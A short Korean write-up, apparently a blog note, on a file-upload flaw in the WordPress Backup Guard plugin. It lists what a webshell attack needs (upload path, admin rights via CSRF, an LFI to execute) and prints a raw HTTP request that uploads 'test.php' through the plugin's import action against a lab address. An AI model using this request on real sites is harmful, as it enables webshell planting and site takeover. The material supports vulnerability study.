해당 취약점만으로는 webshell을 동작시킬순 없고, 해당 사이트에 전제조건이 몇가지 필요하다.
1. Backup Guard 를 통해 올린 파일의 경로를 알수 있어야 함. (디렉토리 리스팅이 가능하면 최적일것임.)
2. 관리자 권한을 사용 해야함. CSRF등을 통해서 하면 될듯?
3. php 확장자로 올라가지 않으므로 경로를 안다고 해도 텍스트 파일로 보일뿐. 따라서 LFI 등의 취약점이 연계되어야함.
POST http://192.168.0.91/wp-admin/admin-ajax.php HTTP/1.1 Host: 192.168.0.91 Connection: keep-alive Content-Length: 1946784 Accept: application/json, text/javascript, */*; q=0.01 Origin: http://192.168.0.91 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqE6amufQR0PqHraP Referer: http://192.168.0.91/wp-admin/admin.php?page=backup_guard_backups Accept-Encoding: gzip, deflate Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4 Cookie: wordpress_87cfb3563f93a5d2c31273cd0ae7bdba=Sakuya%7C1455929929%7CI7o0EJxhU8ClcrYCEUgAkH6jsG5ra6LSstuEFSbiXXd%7C19f158651e5c5c1fe87fe3a2ab632c9506ceb98f23e1d6fd747b05e8668fe492; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_87cfb3563f93a5d2c31273cd0ae7bdba=Sakuya%7C1455929929%7CI7o0EJxhU8ClcrYCEUgAkH6jsG5ra6LSstuEFSbiXXd%7C1f1c5e2111be175767c1f2f14ac571a1fe9a5453240b9e331093ef6ce229f0d9; wp-settings-1=libraryContent%3Dbrowse; wp-settings-time-1=1455757129 ------WebKitFormBoundaryqE6amufQR0PqHraP Content-Disposition: form-data; name="sgbpFile"; filename="test.php" Content-Type: application/octet-stream ------WebKitFormBoundaryqE6amufQR0PqHraP Content-Disposition: form-data; name="action" backup_guard_importBackup ------WebKitFormBoundaryqE6amufQR0PqHraP--Referer : http://www.pritect.net/blog/backup-guard-1-0-3-security-vulnerability
